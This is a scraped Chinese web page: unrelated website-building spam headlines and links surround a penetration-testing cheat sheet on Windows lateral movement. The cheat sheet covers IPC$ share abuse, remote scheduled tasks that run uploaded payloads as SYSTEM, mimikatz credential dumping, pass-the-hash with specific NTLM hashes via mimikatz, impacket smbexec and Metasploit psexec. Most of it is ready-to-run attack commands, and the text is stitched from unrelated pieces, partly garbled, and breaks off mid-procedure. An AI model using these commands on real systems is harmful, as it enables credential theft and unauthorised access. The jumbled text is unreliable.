当前位置: 首页 > news >正文

无锡网站设计制作asp.net获取网站地址

无锡网站设计制作,asp.net获取网站地址,邯郸网站建设在哪里,网站伪静态怎么做IPC$详解 IPC( Internet Process Connection) 共享 “ 命名管道 ” 的资源 , 是为了实现进程间通信而开放的命名管道。 IPC 可以通过验证用户名和密码获得相应的权限#xff0c;通常在远程管理计算机和查看计算机的共享资源时使用 通过 ipc$ #xff0c;可以与目标机器建立连…IPC$详解 IPC( Internet Process Connection) 共享 “ 命名管道 ” 的资源 , 是为了实现进程间通信而开放的命名管道。 IPC 可以通过验证用户名和密码获得相应的权限通常在远程管理计算机和查看计算机的共享资源时使用 通过 ipc$ 可以与目标机器建立连接。利用这个连接不仅可以访问目标机器中的文件 , 进行上传、下载 操作 还可以在日标机器上运行其他命令以获取目标机器的目录结构、用户列表等信息 其默认使用端口为139、445 利用条件 1.开启139、445端口. 2.管理员开启默认共享可以用net share 查看 详细命令 建立ipc连接net use \\10.1.1.135\$ipc 删除ipc连接net use \\10.1.1.135\$ipc /del 遍历c盘下windows目录: dir \\10.1.1.135\c$\Windows 或者:dir \\10.1.1.135\admin$ 复制本地文件到目标机器下users目录: copy shell.bat \\10.1.1.135\c$\Users 查看任务tasklist /S \\10.1.1.135windows2008及以下 添加一项ID为777的任务在4:13执行 at \\10.1.1.132: 4:13 c:\artifact.exe added a new job with jobid777 查看计划任务列表 at \\10.1.1.132 删除 id 为 777 的计划任务不加 id 删除所有计划任务 at \\10.1.1.132 777 /deletewindows2008以上 添加一项ID为test的任务在4:13执行 schtasks /create /s 10.1.1.135 /tn test /sc once /st 04:13 /ru system /tr cmd.exe /c ipconfig c:\1.txt /f /u 立即执行该任务 schtasks /run /s 10.1.1.135 /i /tn test 删除该任务 schtasks /s 10.1.1.135 /delete /tn test /f没有命令回显: 计划运行后 type \\10.1.1.135\c$\1.txt Windows认证 windows本地认证 路径 %SystemRoot%\system32\config\sam   (c:\\windows\system32\config\sam) 当我们登录系统的时候 , 系统会自动地读取 SAM 文件中的 “ 密码 ” 与我们输入的 “ 密码 ” 进行比对如果相 同证明认证成功! 这个SAM 文件中保留了计算机本地所有用户的凭证信息可以理解为是一个数据库。 NTLM Hash NTLM HASH 是支持 Net NTLM 认证协议以及本地认证过程中的一个重要参与物其长度为 32 位 由数字和字母组成 Windows 本身不存储用户的明文密码他会将用户的明文密码经过加密算法后存储在 SAM 数据库 中 当用户登录时将用户输入的明文密码也加密成 NTLM HASH 与 SAM 数据库中的 NTLM HASH 进 行对比 NTLM HASH 的前身是 LM HASH 目前已经基本被淘汰因为算法比较脆弱但是目前老 版本操作系统还是存在比如 XP Server 03 。 这个 NTLM 是一种网络认证协议与 NTLM Hash 的关系就是 NTLM 网络认证协议是以 NTLM Hash 作为根本凭证进行认证的协议。也就是说 NTLM 与 NTLM Hash 相互对应。 LM Hash(已废弃) 在 NTLM 协议问世之前它的前身就是 LM LAN Manager 协议。 LM 与 NTLM 协议的认证机制相同但是加密算法不同。 目前大多数的 Windows 都采用 NTLM 协议认证 LM 协议已经基本淘汰了服务器版从 Wndows Sever2003 以后 Windows 操作系统的认证方式均为 NTLM Hash 。 Windows网络认证 NTLM协议 NTLM 是一种网络认证协议它是基于挑战 Chalenge / 响应 Response 认证机制的一种认证模 式。这个协议只支持Windows 早期 SMB 协议在网络上传输明文口令。后来出现 LAN Manager Challenge/Response 验证机制简称 LM 它是如此简单以至很容易就被破解现在又有了 NTLM 以及 Kerberos。 NTLM V2协议 NTLM v1 与 NTLM v2 最显著的区别就是 Challenge 与加密算法不同共同点就是加密的原料都是 NTLM Hash。 不同之处 : Challage:NTLM v1 的 Challenge 有 8 位 NTLM v2 的 Challenge 为 16 位。 Net-NTLM Hash:NTLM v1 的主要加密算法是 DES NTLM v2 的主要加密算法是 HMAC-MD5 。 Pass The Hash 哈希传递 哈希传递是能够在不需要账户明文密码的情况下完成认证的一个技术。解决了我们渗透中获取不到明文密码、破解不了NTLM Hash而又 想扩大战果的问题 进行哈希传递的必要条件: 1.哈希传递需要被认证的主机能够访问到服务器 2.哈希传递需要被传递认证的用户名 3.哈希传递需要被传递认证用户的 NTLM Hash 常用工具 mimikatz(windows-windows) cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限 nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码 kerberos::purge # 清除票据 kerberos::list # 查看票据 kerberos::ptc # 导入票据 kerberos::clist # 导入.bin文件 lsadump::lsa /patch #在DC上查询所有域用户的密码mimikatz.exe privilege::debug sekurlsa::logonpasswords 1.txt exit -------一句话抓密码 常规流程 mimikatz # a:: // 查看模块 以管理员或其他高权限启动 mimikatz mimikatz # privilege::debug // 提升至 system 权限 显示 Privilege 20 OK 表示提权成功 mimikatz # sekurlsa:: // 查看指定模块下命令 mimikatz # sekurlsa::logonPasswords // 抓取密码及 hash 哈希传递 hash 传递成功后 mimikatz 会帮你打开一个目标机 system 权限的 cmd 窗口 mimikatz # privilege::debug mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK /ntlm:afffeba176210fad4628f0524bfe1942 安装 KB2871997 补丁主机 AES256 密钥哈希传递 mimikatz # privilege::debug mimikatz # sekurlsa::ekeys mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK /aes256:抓到 的aes256值 impacket - smbexec.py(linux-windows) smbexec.py # 明文密码传递 smbexec.py administrator:123.com\192.168.23.144 # NTLM hash 传递 smbexec.py administrator192.168.23.144 -hashes :afffeba176210fad4628f0524bfe1942 smbexec.py PEIXUN/Administrator192.168.23.100 -hashes :afffeba176210fad4628f0524bfe1942 msf-psexec msfconsole use /exploit/windows/smb/psexec show options 可以看到已经默认设置完了但是需要额外设置smbuser、smbpass、rhost set rhost 10.1.1.128 #目标地址 set SMBUser Administrator #目标地址username set smbpass bc527e95ccf12e45f4e80923367f85d:2f60d4a58005210ac1580a9aaa7d7e95 #通过mimikatz抓取到的目标地址的LM和NTLM
http://www.zqtcl.cn/news/790246/

相关文章:

  • 三拼域名做网站大连自助建站软件
  • 怎么做hs网站最专业的网站开发公司哪家最专业
  • 南京做网站的公司排名科技:开局研发六代战机许禾
  • 网站怎么做搜索引擎淘宝网站怎么做特价
  • 仿制网站建设oa办公系统官网
  • 深圳网站托管企业建站源码系统
  • 个人空间网站建设报告建站是什么东西
  • 好看的模板网站建设西安网站模板建站
  • 建设网站二级子页打不开广告设计平面设计培训班
  • 网站公司做网站要多少钱新乡
  • 天津谁做网站莱芜人才网招聘网
  • 学做网站的书籍自己做网站 最好的软件
  • 手机网站专题电商入门视频教程免费
  • aspx网站模板制作网页常用的软件有哪些
  • 网站主关键词湖南网站定制
  • 长沙seo网站排名优化公司进入秦皇岛最新规定
  • 企业网站优化平台宝山北京网站建设
  • 给人做代工的网站加盟代理网
  • 网站建设用dw电脑谷歌浏览器打开是2345网址导航
  • 做外贸一般总浏览的网站太原的网站建设公司哪家好
  • 台州建网站公司wordpress 用微信登陆
  • 广州白云网站建设家在深圳业主
  • 呼和浩特网站建设哪家最便宜?携程旅行网网站策划书
  • 网站建设及相关流程北京网站备案域名
  • 汉字叔叔花了多少钱做网站微商城科技
  • 网站代理被抓html网站开发实战
  • 如何建立免费的网站网站copyright写法
  • 官方网站下载12306合肥有没有做网站的单位
  • 甘露园网站建设网站框架图片
  • 做网站怎样赚卖流量石家庄网站建设联系电话